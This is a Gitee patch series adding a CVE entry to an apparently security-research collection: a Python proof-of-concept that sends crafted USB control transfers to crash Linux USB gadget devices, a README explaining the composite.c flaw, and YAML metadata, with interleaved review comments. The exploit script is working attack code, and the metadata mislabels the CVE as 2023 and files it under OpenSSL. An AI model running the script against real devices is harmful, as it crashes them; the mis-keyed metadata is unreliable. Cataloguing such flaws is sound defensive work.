From 7fcd242c24ab4293fce71d5f1d9a8a97b9ae7d27 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?=
Date: Sun, 12 Mar 2023 09:09:48 +0000
Subject: [PATCH 1/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE=5F2023=5F25258?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/openssl/2023/CVE_2023_25258/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/openssl/2023/CVE_2023_25258/.keep
diff --git a/cve/openssl/2023/CVE_2023_25258/.keep b/cve/openssl/2023/CVE_2023_25258/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 7d69bc97242a9ac776cb341e1aab19a18aaf23f3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?=
Date: Sun, 12 Mar 2023 09:16:17 +0000
Subject: [PATCH 2/8] =?UTF-8?q?add=20cve/openssl/2023/CVE=5F2023=5F25258/C?= =?UTF-8?q?VE=5F2023=5F25258.py.=20=E5=9C=A8=205.16.10=20=E4=B9=8B?= =?UTF-8?q?=E5=89=8D=E7=9A=84=20Linux=20=E5=86=85=E6=A0=B8=E4=B8=AD?= =?UTF-8?q?=E7=9A=84=20drivers/usb/gadget/composite.c=20=E4=B8=AD=E5=8F=91?= =?UTF-8?q?=E7=8E=B0=E4=BA=86=E4=B8=80=E4=B8=AA=E9=97=AE=E9=A2=98=E3=80=82?= =?UTF-8?q?USB=20=E5=B0=8F=E5=B7=A5=E5=85=B7=E5=AD=90=E7=B3=BB=E7=BB=9F?= =?UTF-8?q?=E7=BC=BA=E5=B0=91=E5=AF=B9=E6=8E=A5=E5=8F=A3=E6=93=8D=E4=BD=9C?= =?UTF-8?q?=E7=B3=BB=E7=BB=9F=E6=8F=8F=E8=BF=B0=E7=AC=A6=E8=AF=B7=E6=B1=82?= =?UTF-8?q?=EF=BC=88=E5=85=B7=E6=9C=89=E5=A4=A7=E5=9E=8B=E6=95=B0=E7=BB=84?= =?UTF-8?q?=E7=B4=A2=E5=BC=95=E7=9A=84=E8=AF=B7=E6=B1=82=E5=92=8C=E4=B8=8E?= =?UTF-8?q?=20NULL=20=E5=87=BD=E6=95=B0=E6=8C=87=E9=92=88=E6=A3=80?= =?UTF-8?q?=E7=B4=A2=E5=85=B3=E8=81=94=E7=9A=84=E8=AF=B7=E6=B1=82=EF=BC=89?= =?UTF-8?q?=E7=9A=84=E6=9F=90=E4=BA=9B=E9=AA=8C=E8=AF=81=EF=BC=8C=E5=8F=AF?= =?UTF-8?q?=E8=83=BD=E4=BC=9A=E5=8F=91=E7=94=9F=E5=86=85=E5=AD=98=E6=8D=9F?= =?UTF-8?q?=E5=9D=8F=E3=80=82?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李思佳
---
.../2023/CVE_2023_25258/CVE_2023_25258.py | 94 +++++++++++++++++++
1 file changed, 94 insertions(+)
create mode 100644 cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py
diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py
new file mode 100644
index 00000000..475ebc94
--- /dev/null
+++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py
@@ -0,0 +1,94 @@
+#!/usr/bin/python3
+
+#
+# Sample exploit to demonstrate Linux USB gadget
+# subsystem's os descriptor handling flaws.
+#
+# This script requires pyusb.
+#
+# https://github.com/szymonh
+#
+
+import argparse
+
+import usb.core
+
+
+REQ_GET_DESCRIPTOR = 0x06
+
+
+def auto_int(val: str) -> int:
+ '''Convert arbitrary string to integer
+ Used as argparse type to automatically handle input with
+ different base - decimal, octal, hex etc.
+ '''
+ return int(val, 0)
+
+
+def parse_args() -> argparse.Namespace:
+ '''Parse command line arguments
+ '''
+ parser = argparse.ArgumentParser(
+ description='Sample exploit for interface OS descriptor vulnerability'
+ )
+
+ parser.add_argument('-v', '--vid', type=auto_int, required=True,
+ help='vendor id')
+ parser.add_argument('-p', '--pid', type=auto_int, required=True,
+ help='product id')
+
+ return parser.parse_args()
+
+
+def print_request(req_type, req, val, idx, length):
+ '''Write control transfer request to stdout
+ '''
+ print('{0:02X} {1:02X} {2:04X} {3:04X} {4:04X} '.format(
+ req_type, req, val, idx, length), end=' ')
+
+
+def exploit(args: argparse.Namespace) -> None:
+ '''Attempt exploit the interface OS descriptor
+ Kernel will crash due to null pointer dereference and access
+ beyond array boundaries.
+ '''
+ usbdev = usb.core.find(idVendor=args.vid, idProduct=args.pid)
+ if usbdev is None:
+ print('Device not found, verify specified VID and PID')
+ return
+
+ for cfg in usbdev:
+ for idx in range(cfg.bNumInterfaces):
+ if usbdev.is_kernel_driver_active(idx):
+ usbdev.detach_kernel_driver(idx)
+ usbdev.set_configuration()
+
+ data = usbdev.ctrl_transfer(0x80, REQ_GET_DESCRIPTOR, (0x03 << 8) | 0xee, 0x00, 0x12)
+ if not data or len(data) != 0x12:
+ print('OS descriptors are not supported')
+ exit(1)
+
+ vendor_code = data[16]
+ print('Vendor code: {0}'.format(vendor_code))
+
+ bmRequestType = 0xc1 # USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_INTERFACE
+ bRequest = vendor_code # set to vendor code
+ wValue = 0x00 # upper byte needs to be zero, lower is the interface index
+ wIndex = 0x05 # needs to be 0x5
+ payload = 4096 # value larger than 0x0A
+
+ # iterate throught the c->interface array and beyond
+ for val in range(0x00, 0xff):
+ wValue = val
+ try:
+ print_request(bmRequestType, bRequest, wValue, wIndex, payload)
+ data = usbdev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, payload)
+ print('Read data: {0}'.format(data))
+ except usb.core.USBError as e:
+ print(e)
+
+
+if __name__ == '__main__':
+ '''Main script
+ '''
+ exploit(parse_args())
\ No newline at end of file
-- Gitee
From 4accc831ad53635a11a57523e1a7265c4fb4eb03 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?=
Date: Sun, 12 Mar 2023 09:26:48 +0000
Subject: [PATCH 3/8] add cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李思佳
---
.../2023/CVE_2023_25258/CVE_2023_25258.yaml | 20 +++++++++++++++++++
1 file changed, 20 insertions(+)
create mode 100644 cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml
diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml
new file mode 100644
index 00000000..7fda0900
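Review bot: `exit(1)` after the `OS descriptors are not supported` message is the `site`-module convenience name rather than `sys.exit`, so under `python3 -S` or in a frozen build the script dies with a NameError instead of returning status 1; add `import sys` beside `import argparse` and call `sys.exit(1)`. The triple-quoted `'''Main script'''` under `if __name__ == '__main__':` is an ordinary string expression, not a docstring, and should be a `#` comment. `usbdev.set_configuration()` is issued inside the `for cfg in usbdev` loop, once per configuration, which looks unintended; if a single active configuration is meant it belongs after the loop. Minor: 'throught' in the loop comment should read 'through'.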
--- /dev/null
+++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-25258
+source:
+https://github.com/szymonh/d-os-descriptor
+info:
+name: An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur.
+severity: medium
+description: |
+An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur.
+scope-of-influence:
+linux 5.16.10
+reference:
+https://nvd.nist.gov/vuln/detail/CVE-2022-25258
+classification:
+cvss-metrics: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+cvss-score: 4.6
+cve-id: CVE-2023-25258
+cwe-id: CWE-476
+cnvd-id: None
+kve-id: None
+tags: USB,validation
\ No newline at end of file
-- Gitee
From c8e11edd64da363ee9f9b9cd3f176afd72b81e7b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?=
Date: Sun, 12 Mar 2023 09:30:11 +0000
Subject: [PATCH 4/8] update openkylin_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李思佳
---
openkylin_list.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index f822acc2..1731f599 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -56,6 +56,7 @@ cve:
 - CVE-2022-2274
 - CVE-2022-3602
 - CVE-2023-25136
+ - CVE-2023-25258
 libxml2:
 - CVE-2020-24977
 - CVE-2021-3517
-- Gitee
From 76f2cfc18c5c43bf1362912c3ee3c8b10ddcd1df Mon Sep 17 00:00:00 2001
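Review bot: `id:` and `cve-id:` say CVE-2023-25258 while the only `reference:` in this hunk is `https://nvd.nist.gov/vuln/detail/CVE-2022-25258`, and the README added in [PATCH 5/8] of this series names CVE-2022-25258 for the same composite.c issue; the identifier, the directory `cve/openssl/2023/CVE_2023_25258/` and the `openkylin_list.yaml` entry in the next hunk all appear mis-keyed and should be checked against NVD before merging. The [PATCH 7/8] rewrite of this file keeps the 2023 identifier, so the same check applies there. The affected component is the Linux kernel USB gadget driver, not OpenSSL, so filing the entry under `cve/openssl/` looks wrong as well. `scope-of-influence: linux 5.16.10` also disagrees with the `name:` text, which scopes the issue to kernels before 5.16.10; `scope-of-influence: Linux kernel < 5.16.10` would match the description.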
From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?=
Date: Sun, 12 Mar 2023 09:38:25 +0000
Subject: [PATCH 5/8] add cve/openssl/2023/CVE_2023_25258/README.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李思佳
---
cve/openssl/2023/CVE_2023_25258/README | 56 ++++++++++++++++++++++++++
1 file changed, 56 insertions(+)
create mode 100644 cve/openssl/2023/CVE_2023_25258/README
diff --git a/cve/openssl/2023/CVE_2023_25258/README b/cve/openssl/2023/CVE_2023_25258/README
new file mode 100644
index 00000000..bf3208bd
--- /dev/null
+++ b/cve/openssl/2023/CVE_2023_25258/README
@@ -0,0 +1,56 @@
+#d-os-descriptor
+##Summary
+The USB Gadget Subsystem includes security issues in the OS descriptor handling section of composite_setup function (composite.c). Processing of properly crafted control transfer request messages result in device crash due to null pointer dereference or memory corruption.
+##Description
+The OS descriptor handling section of composite_setup for interface recipient is implemented as follows.
+case USB_RECIP_INTERFACE:
+ if (w_index != 0x5 || (w_value >> 8))
+ break;
+ interface = w_value & 0xFF;
+ buf[6] = w_index;
+ count = count_ext_prop(os_desc_cfg,
+ interface);
+ put_unaligned_le16(count, buf + 8);
+ count = len_ext_prop(os_desc_cfg,
+ interface);
+ put_unaligned_le32(count, buf);
+ value = w_length;
+ if (w_length > 0x0A) {
+ value = fill_ext_prop(os_desc_cfg,
+ interface, buf);
+ if (value >= 0)
+ value = min_t(u16, w_length, value);
+}
+break;
+The interface variable is derived from w_value and later utilized to index usb_configuration->interface array in count_ext_prop, len_ext_prop and fill_ext_prop functions. Since c->interface array has the size of MAX_CONFIG_INTERFACES (16) elements and interface variable is not validated in neither composite_setup's OS descriptor handling section nor the called functions this allows an attacker to index the c->interface array past the actual boundaries. In case interface variable has a value greater or equal to MAX_CONFIG_INTERFACES the endpoint should be stalled.
+
+In certain cases, depending on actual memory content indexing past c->interface array may trigger buffer overflow of req->buf via fill_ext_prop when wLength is greater than 0x0A. If sum of ext_prop->name_len, ext_prop->data_len, 14 and 10 overflows int the count + n >= USB_COMP_EP0_OS_DESC_BUFSIZ condition would not be met allowing overflow via memcpy in usb_ext_prop_put_binary. Yet the probability of such situation seems pretty low.
+
+Furthermore the functions count_ext_prop, len_ext_prop and fill_ext_prop are missing validation if the *usb_function retrieved from c->interface array is actually valid resulting in null pointer dereference. When the retrieved usb_function pointer is null the endpoint should be stalled.
+static int count_ext_prop(struct usb_configuration *c, int interface)
+{
+ struct usb_function *f;
+ int j;
+
+ f = c->interface[interface];
+ for (j = 0; j < f->os_desc_n; ++j) {
+ struct usb_os_desc *d;
+
+ if (interface != f->os_desc_table[j].if_id)
+ continue;
+ d = f->os_desc_table[j].os_desc;
+ if (d && d->ext_compat_id)
+ return d->ext_prop_count;
+ }
+return 0;
+}
+##Impact
+Linux (and Android) devices exposing usb gadgets with OS descriptor support may be arbitrarily crashed by a malicious host by means of a single control transfer message.
+
+##CVE
+CVE-2022-25258
+
+##Patch
+A patch addressing the described issue was accepted and is now available in supported kernel versions. For more information consult the below link.
+
+USB: gadget: validate interface OS descriptor requests
\ No newline at end of file
-- Gitee
From 44e830557bd46bb395c3b3ec0b0705077b90a665 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?=
Date: Mon, 13 Mar 2023 08:44:13 +0000
Subject: [PATCH 6/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?openssl/2023/CVE=5F2023=5F25258/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/openssl/2023/CVE_2023_25258/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
delete mode 100644 cve/openssl/2023/CVE_2023_25258/.keep
diff --git a/cve/openssl/2023/CVE_2023_25258/.keep b/cve/openssl/2023/CVE_2023_25258/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 2fb5d1efea2e0b67554a2d012712b47e1a628cbc Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?=
Date: Mon, 13 Mar 2023 14:23:43 +0000
Subject: [PATCH 7/8] update cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李思佳
---
.../2023/CVE_2023_25258/CVE_2023_25258.yaml | 41 +++++++++++--------
1 file changed, 23 insertions(+), 18 deletions(-)
diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml
index 7fda0900..3847b9ec 100644
--- a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml
+++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml
@@ -1,20 +1,25 @@
 id: CVE-2023-25258
-source:
-https://github.com/szymonh/d-os-descriptor
+source: https://github.com/szymonh/d-os-descriptor
 info:
-name: An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur.
-severity: medium
-description: |
-An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur.
-scope-of-influence:
-linux 5.16.10
-reference:
-https://nvd.nist.gov/vuln/detail/CVE-2022-25258
-classification:
-cvss-metrics: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
-cvss-score: 4.6
-cve-id: CVE-2023-25258
-cwe-id: CWE-476
-cnvd-id: None
-kve-id: None
-tags: USB,validation
\ No newline at end of file
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: important
+ description: |
+ 在5.16.10之前的Linux内核中的drivers/usb/gadget/composite.c中发现了一个问题:USB小工具子系统缺少对接口操作系统描述符请求(具有大型数组索引的请求和与NULL函数指针检索关联的请求)的某些验证,因此可能会发生内存损坏。
+ scope-of-influence:
+ Red Hat Enterprise Linux 9
+ reference:
+ - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.10
+ - https://github.com/szymonh/d-os-descriptor
+ - https://github.com/torvalds/linux/commit/75e5b4849b81e19e9efe1654b30d7f3151c33c2c
+ - https://lists.debian.org/debian-lts-announce/2022/03/msg00011.html
+ - https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html
+ - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TCW2KZYJ2H6BKZE3CVLHRIXYDGNYYC5P/
+ - https://security.netapp.com/advisory/ntap-20221028-0007/
+ - https://www.debian.org/security/2022/dsa-5092
+ - https://www.debian.org/security/2022/dsa-5096
+ classification:
+ cvss-metrics: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 4.6
+ cve-id: CVE-2023-25258
+ cwe-id: CWE-476
+ tags: USB,Memory corruption
\ No newline at end of file
-- Gitee
From 129a3757b4e211eac8e4c8e151bb1f6e804c0d9f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?=
Date: Tue, 14 Mar 2023 04:56:34 +0000
Subject: [PATCH 8/8] update cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 李思佳
---
cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml
index 3847b9ec..077affc1 100644
--- a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml
+++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml
@@ -2,7 +2,7 @@ id: CVE-2023-25258
 source: https://github.com/szymonh/d-os-descriptor
 info:
 name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: important
+ severity: MEDIUM
 description: |
 在5.16.10之前的Linux内核中的drivers/usb/gadget/composite.c中发现了一个问题:USB小工具子系统缺少对接口操作系统描述符请求(具有大型数组索引的请求和与NULL函数指针检索关联的请求)的某些验证,因此可能会发生内存损坏。
 scope-of-influence:
-- Gitee
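Review bot: `scope-of-influence: Red Hat Enterprise Linux 9` in the rewritten block is not supported by anything else in the hunk: the `description:` scopes the issue to Linux kernels before 5.16.10 and the `reference:` list holds the kernel.org changelog, the upstream commit and Debian, Fedora and NetApp advisories, none from Red Hat. Either add the advisory the RHEL 9 claim is taken from to `reference:` or state the range the description supports, `scope-of-influence: Linux kernel < 5.16.10`. The new `name:` holds a one-line product description of the Linux kernel rather than the title of the issue; if the schema expects the vulnerability name, the removed `name:` text was the better fit.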